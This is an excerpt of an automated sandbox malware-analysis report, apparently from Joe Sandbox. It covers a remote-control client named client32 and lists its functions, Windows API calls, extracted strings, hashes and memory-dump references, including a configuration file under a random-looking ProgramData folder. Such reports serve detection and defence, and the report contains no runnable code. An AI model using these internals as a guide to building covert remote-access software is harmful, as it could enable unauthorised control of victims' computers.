                                                                                                • API String ID: 2516244645-3838549918
                                                                                                • Opcode ID: 7faece80025c70fec54446182a5c21c21f443a15445860a2d8d887c1bdd45cc3
                                                                                                • Instruction ID: 4687f9d1c33f4841b4317c02a31d049377ff37b4e06c274e4a98fab4b38dea48
                                                                                                • Opcode Fuzzy Hash: 7faece80025c70fec54446182a5c21c21f443a15445860a2d8d887c1bdd45cc3
                                                                                                • Instruction Fuzzy Hash: 2A4182B06413846BFF14DB74CE56F9937A9EB46704F8081B4B704E7AC0DB71E9048B64
                                                                                                Function 69CE5117 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 106fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,nextfileindex,00000001,C:\ProgramData\i99ekubc\Support\pci.ini), ref: 69CE5131
                                                                                                • wsprintfA.USER32 ref: 69CE514A
                                                                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 69CE5168
                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 69CE5172
                                                                                                • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,maxfilesize,000003E8,C:\ProgramData\i99ekubc\Support\pci.ini), ref: 69CE5191
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 69CE51B2
                                                                                                • FlushFileBuffers.KERNEL32(00000000,?,69CE9B16,00000001), ref: 69CE51D8
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 69CE51E4
                                                                                                • wsprintfA.USER32 ref: 69CE5225
                                                                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 69CE5243
                                                                                                • __itow.LIBCMT ref: 69CE5265
                                                                                                • WritePrivateProfileStringA.KERNEL32(htctl.packet_tracing,nextfileindex,00000000), ref: 69CE5278
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$PrivateProfile$Createwsprintf$BuffersCloseFlushHandlePointerSizeStringWrite__itow
                                                                                                • String ID: %spacket%03d.trc$C:\ProgramData\i99ekubc\Support\$C:\ProgramData\i99ekubc\Support\pci.ini$htctl.packet_tracing$maxfilesize$nextfileindex
                                                                                                • API String ID: 2516244645-3838549918
                                                                                                • Opcode ID: 1ae168b44445d05cc928b5efa51f73da23c1a9ffd55a9a80889771f39020f8b8
                                                                                                • Instruction ID: d4faf87c7a3ee661052e69ec151a001be13c77d2178a21779b601825b1b8ecfc
                                                                                                • Opcode Fuzzy Hash: 1ae168b44445d05cc928b5efa51f73da23c1a9ffd55a9a80889771f39020f8b8
                                                                                                • Instruction Fuzzy Hash: 603170B0A413446BFF14DB74DD56F9E37A9EB45704F8081B5B704ABAC0DB71E9048B64
                                                                                                Function 69CF0F10 Relevance: 30.1, APIs: 7, Strings: 10, Instructions: 324COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • _memset.LIBCMT ref: 69CF0FAD
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,69D20E3D,?,?,?,?,?,?,00000000), ref: 69CF1293
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,00000000), ref: 69CF12E3
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,69D20E3D,?,?,?,?,?,?,00000000), ref: 69CF1316
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,00000000), ref: 69CF132D
                                                                                                • std::exception::exception.LIBCMT ref: 69CF135B
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CF1376
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave_memset$Exception@8Throw_mallocstd::exception::exceptionwsprintf
                                                                                                • String ID: CAP$ENC$END_REC$FLG$MORE$RESULT$TIM$TXT$UID$b
                                                                                                • API String ID: 275297366-914382535
                                                                                                • Opcode ID: 21080207ac82195cd5433d1009bb770e0d118809fa449bf12a6aff8f6259551a
                                                                                                • Instruction ID: b0f82785e32700f2528cb876150c04b1d1469ce86750bbdf81f2772c3dff587f
                                                                                                • Opcode Fuzzy Hash: 21080207ac82195cd5433d1009bb770e0d118809fa449bf12a6aff8f6259551a
                                                                                                • Instruction Fuzzy Hash: 70C18EF5C002599BDF50DFA4EC81AAEB7B4BF04308F40917AE50AA6641F7345B5ACB62
                                                                                                Function 110EB540 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 141windowtimeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                • wsprintfA.USER32 ref: 110EB5D8
                                                                                                • GetTickCount.KERNEL32(_debug,TracePlugins,00000000,00000000,?,?,00000000), ref: 110EB632
                                                                                                • SendMessageA.USER32(?,0000004A,?,?,?,00000000), ref: 110EB646
                                                                                                • GetTickCount.KERNEL32(?,0000004A,?,?,?,00000000), ref: 110EB64E
                                                                                                • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB696
                                                                                                • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000000), ref: 110EB6C8
                                                                                                • SetEvent.KERNEL32(00000000,?,00000000), ref: 110EB6D5
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110EB6DC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                                • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                                • API String ID: 3451743168-2289091950
                                                                                                • Opcode ID: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                                                • Instruction ID: 06eeb675c9fb82aaee3c5e1b90d71b9ae50c85907530b7dc4e87486fa2a47647
                                                                                                • Opcode Fuzzy Hash: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                                                • Instruction Fuzzy Hash: A141E775A012199FD724CFA5DC84FAEF7B8EF48304F1085AAE91AA7640D631AD40CFB1
                                                                                                Function 69CEA000 Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 197COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __wcstoui64.LIBCMT ref: 69CEA057
                                                                                                  • Part of subcall function 69D049AE: strtoxl.LIBCMT ref: 69D049D0
                                                                                                • ctl_getsession.HTCTL32(?), ref: 69CEA09B
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?), ref: 69CEA0BA
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CEA0EB
                                                                                                • _strncat.LIBCMT ref: 69CEA132
                                                                                                • _free.LIBCMT ref: 69CEA22F
                                                                                                • _free.LIBCMT ref: 69CEA238
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection_free$EnterLeave__wcstoui64_strncatctl_getsessionstrtoxl
                                                                                                • String ID: 445817$CLIENT_NAME=%s$CMD=CONNECT_REPLY$CONNECTION_ID$CONNECTION_ID=%u$CONTROL_ADDR$CONTROL_NAME$NC_$RESULT=%d
                                                                                                • API String ID: 1400833098-4076260567
                                                                                                • Opcode ID: 0d24102a68e323ad29a82423749b8a1d2790be82eb12c5618b772d7527612f3b
                                                                                                • Instruction ID: 80287fac870def5465933d3d390110ccb045b0595a0fc78aa4747b1b62b5d079
                                                                                                • Opcode Fuzzy Hash: 0d24102a68e323ad29a82423749b8a1d2790be82eb12c5618b772d7527612f3b
                                                                                                • Instruction Fuzzy Hash: 9E716FB5D00248AFDB10DFE8EC81BAEBBB8AF49314F549439E506E7240F77599058BA1
                                                                                                Function 11039410 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 126windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                • GetDlgItem.USER32(00000000,00000001), ref: 1103944A
                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 1103944F
                                                                                                • _calloc.LIBCMT ref: 1103945C
                                                                                                • GetSystemMenu.USER32 ref: 11039490
                                                                                                • EnableMenuItem.USER32 ref: 1103949E
                                                                                                • GetDlgItem.USER32(00000000,0000044E), ref: 110394BC
                                                                                                • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000043), ref: 11039509
                                                                                                • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 11039538
                                                                                                • UpdateWindow.USER32 ref: 11039567
                                                                                                • BringWindowToTop.USER32(?), ref: 1103956E
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                  • Part of subcall function 1115FFC0: SetForegroundWindow.USER32(?), ref: 1115FFEE
                                                                                                • MessageBeep.USER32(000000FF,00000001), ref: 1103957F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$Item$EnableMenuMessage$BeepBringErrorExitForegroundLastObjectProcessRectShowSystemTextUpdate_callocwsprintf
                                                                                                • String ID: CLTCONN.CPP$e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_nc
                                                                                                • API String ID: 4191401721-1182766118
                                                                                                • Opcode ID: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
                                                                                                • Instruction ID: fea8d420f6ab3010a63bc2930e21c2de0d8b75aa48f279369a9769ea0f724755
                                                                                                • Opcode Fuzzy Hash: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
                                                                                                • Instruction Fuzzy Hash: 0C411AB9B803157BE7209761DC87F9AF398AB84B1CF104434F3267B6C0EAB5B4408759
                                                                                                Function 110CB450 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 117registryclipboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(111F3420,?,00000000,00000000,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB45E
                                                                                                • RegisterClipboardFormatA.USER32(WM_ATLGETHOST), ref: 110CB46F
                                                                                                • RegisterClipboardFormatA.USER32(WM_ATLGETCONTROL), ref: 110CB47B
                                                                                                • GetClassInfoExA.USER32(11000000,AtlAxWin100,?), ref: 110CB4A0
                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110CB4D1
                                                                                                • RegisterClassExA.USER32 ref: 110CB4F2
                                                                                                • _memset.LIBCMT ref: 110CB51B
                                                                                                • GetClassInfoExA.USER32(11000000,AtlAxWinLic100,?), ref: 110CB536
                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110CB56B
                                                                                                • RegisterClassExA.USER32 ref: 110CB58C
                                                                                                • LeaveCriticalSection.KERNEL32(111F3420,0000000E), ref: 110CB5B5
                                                                                                • LeaveCriticalSection.KERNEL32(111F3420,?,?,?,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB5CB
                                                                                                  • Part of subcall function 110C2C00: __recalloc.LIBCMT ref: 110C2C48
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ClassRegister$CriticalSection$ClipboardCursorFormatInfoLeaveLoad$Enter__recalloc_memset
                                                                                                • String ID: AtlAxWin100$AtlAxWinLic100$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                                • API String ID: 2220097787-1587594278
                                                                                                • Opcode ID: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                                • Instruction ID: 380367346e18165f725bae6bc82d4f79de56b371e9301c8febdab5dbf058e0d0
                                                                                                • Opcode Fuzzy Hash: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                                • Instruction Fuzzy Hash: 854179B5D02229ABCB01DFD9E984AEEFFB9FB48714F50406AE415B3200DB351A44CFA4
                                                                                                Function 11047010 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 214COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _calloc.LIBCMT ref: 1104702F
                                                                                                • wsprintfA.USER32 ref: 110470AE
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                • wsprintfA.USER32 ref: 110470E9
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000014,00000080), ref: 11047203
                                                                                                • _strrchr.LIBCMT ref: 1104720C
                                                                                                • GetWindowsDirectoryA.KERNEL32(00000016,00000080), ref: 11047235
                                                                                                • _free.LIBCMT ref: 11047251
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wsprintf$DirectoryErrorExitFileLastMessageModuleNameProcessWindows_calloc_free_strrchr
                                                                                                • String ID: %s %s$CLTCONN.CPP$NSA %s$NSS$V1.10$V12.00$V12.10$V12.10F20
                                                                                                • API String ID: 1757445300-1785190265
                                                                                                • Opcode ID: 8df59efd58386d5d632d4f9a1d1019fa2f1450115bc2f61edf1bae4acd3b0bfd
                                                                                                • Instruction ID: 26d4bceacdf9fffedd66530a5670ce95754bb6fc5caa385817b5218b2f2053ae
                                                                                                • Opcode Fuzzy Hash: 8df59efd58386d5d632d4f9a1d1019fa2f1450115bc2f61edf1bae4acd3b0bfd
                                                                                                • Instruction Fuzzy Hash: 3F619A78E00657ABD714CFB48CC1B6FF7E99F40308F1048A8ED5697641EA62F904C3A2
                                                                                                Function 1100B440 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 190fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                • _malloc.LIBCMT ref: 1100B496
                                                                                                  • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                                  • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                                  • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                  • Part of subcall function 1100AD10: EnterCriticalSection.KERNEL32(000000FF,986DAFD2,?,00000000,00000000), ref: 1100AD54
                                                                                                  • Part of subcall function 1100AD10: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100AD72
                                                                                                  • Part of subcall function 1100AD10: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ADBE
                                                                                                  • Part of subcall function 1100AD10: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AE05
                                                                                                  • Part of subcall function 1100AD10: CloseHandle.KERNEL32(00000000), ref: 1100AE0C
                                                                                                  • Part of subcall function 1100AD10: _free.LIBCMT ref: 1100AE23
                                                                                                  • Part of subcall function 1100AD10: FreeLibrary.KERNEL32(?), ref: 1100AE3B
                                                                                                  • Part of subcall function 1100AD10: LeaveCriticalSection.KERNEL32(?), ref: 1100AE45
                                                                                                • EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,986DAFD2,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
                                                                                                • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000), ref: 1100B4E8
                                                                                                • _calloc.LIBCMT ref: 1100B519
                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F
                                                                                                • LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579
                                                                                                • LeaveCriticalSection.KERNEL32(1100CB7A,?,?,1100CB7A,?), ref: 1100B59E
                                                                                                Strings
                                                                                                • \\.\NSAudioFilter, xrefs: 1100B4E0
                                                                                                • DisableSounds, xrefs: 1100B472
                                                                                                • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B64C
                                                                                                • Vista new pAudioCap=%p, xrefs: 1100B603
                                                                                                • InitCaptureSounds NT6, xrefs: 1100B5BE
                                                                                                • Audio, xrefs: 1100B477
                                                                                                • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B5F3
                                                                                                • Vista AddAudioCapEvtListener(%p), xrefs: 1100B623
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                                • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                                • API String ID: 1843377891-2362500394
                                                                                                • Opcode ID: c81d25e2e8cb7f75c078c5fd95e92035e2d47ec10419b288dd585f56f01eb885
                                                                                                • Instruction ID: 79732c4921e51442e8b050610a6755ede2f12e6e97fc197f43339bcf40ac1e73
